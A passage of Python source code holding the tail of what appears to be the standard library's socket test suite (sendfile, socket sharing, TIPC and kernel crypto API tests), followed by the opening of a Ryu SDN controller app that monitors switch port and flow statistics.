self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertTrue(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain, socket.MSG_MORE)
op.sendall(b'\x00' * taglen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain + b'\x00' * taglen
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain + b'\x00' * taglen
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg))
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg))
self.assertEqual(plain, res[assoclen:-taglen])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
network_monitor.py
|
# Copyright (C) 2016 Li Cheng at Beijing University of Posts
# and Telecommunications. www.muzixing.com
# Copyright (C) 2016 Huang MaChi at Chongqing University
# of Posts and Telecommunications, China.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import copy
from operator import attrgetter
from threading import Thread
from ryu import cfg
from ryu.base import app_manager
from ryu.base.app_manager import lookup_service_brick
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib import hub
import setting
from DemandEstimation import demand_estimation
CONF = cfg.CONF
class NetworkMonitor(app_manager.RyuApp):
"""
NetworkMonitor is a Ryu app for collecting traffic information.
"""
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(NetworkMonitor, self).__init__(*args, **kwargs)
self.name = 'monitor'
self.awareness = lookup_service_brick('awareness')
self.datapaths = {}
self.port_stats = {}
self.port_speed = {}
self.flow_stats = {}
self.flow_speed = {}
self.stats = {}
self.port_features = {}
self.free_bandwidth = {} # {dpid:{port_no:free_bw,},} Unit:Kbit/s
self.graph = None
self.capabilities = None
self.best_paths = None
# Create four data structures for Hedera specially.
self.hostsList = []
self.flows = [] # Record flows that need to be rescheduled. (hmc)
self.statRecord = []
self.pre_GFF_path = {} # Record the last GFF path of flows
# Start to green thread to monitor traffic and calculating
# free bandwidth of links respectively.
self.monitor_thread = hub.spawn(self._monitor)
self.save_freebandwidth_thread = hub.spawn(self._save_bw_graph)
def _monitor(self):
"""
Main entry method of monitoring traffic.
"""
while CONF.weight == 'bw' or CONF.weight == 'hop':
# Refresh data.
self.stats['flow'] = {}
self.stats['port'] = {}
self.capabilities = None
self.best_paths = None
self.statRecord = []
# self.flows = []
for dp in self.datapaths.values():
self.port_features.setdefault(dp.id, {})
self._request_stats(dp)
hub.sleep(setting.MONITOR_PERIOD)
if self.stats['flow'] or self.stats['port']:
self.show_stat('flow')
self.show_stat('port')
hub.sleep(1)
def _save_bw_graph(self):
"""
Save bandwidth data into networkx graph object.
"""
while CONF.weight == 'bw' or CONF.weight == 'hop':
self.graph = self.create_bw_graph(self.free_bandwidth)
self.logger.debug("save free bandwidth")
hub.sleep(setting.MONITOR_PERIOD)
@set_ev_cls(ofp_event.EventOFPStateChange,
[MAIN_DISPATCHER, DEAD_DISPATCHER])
def _state_change_handler(self, ev):
"""
Record datapath information.
"""
datapath = ev.datapath
if ev.state == MAIN_DISPATCHER:
if not datapath.id in self.datapaths:
self.logger.debug('register datapath: %016x', datapath.id)
self.datapaths[datapath.id] = datapath
elif ev.state == DEAD_DISPATCHER:
if datapath.id in self.datapaths:
self.logger.debug('unregister datapath: %016x', datapath.id)
del self.datapaths[datapath.id]
else:
pass
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def _port_stats_reply_handler(self, ev):
"""
Save port's stats information into self.port_stats.
Calculate port speed and Save it.
self.port_stats = {(dpid, port_no):[(tx_bytes, rx_bytes, rx_errors, duration_sec, duration_nsec),],}
self.port_speed = {(dpid, port_no):[speed,],}
Note: Since the transmit performance and receive performance are
independent of a port, we calculate the current load of a port only
using tx_bytes while finding routing path.
"""
body = ev.msg.body
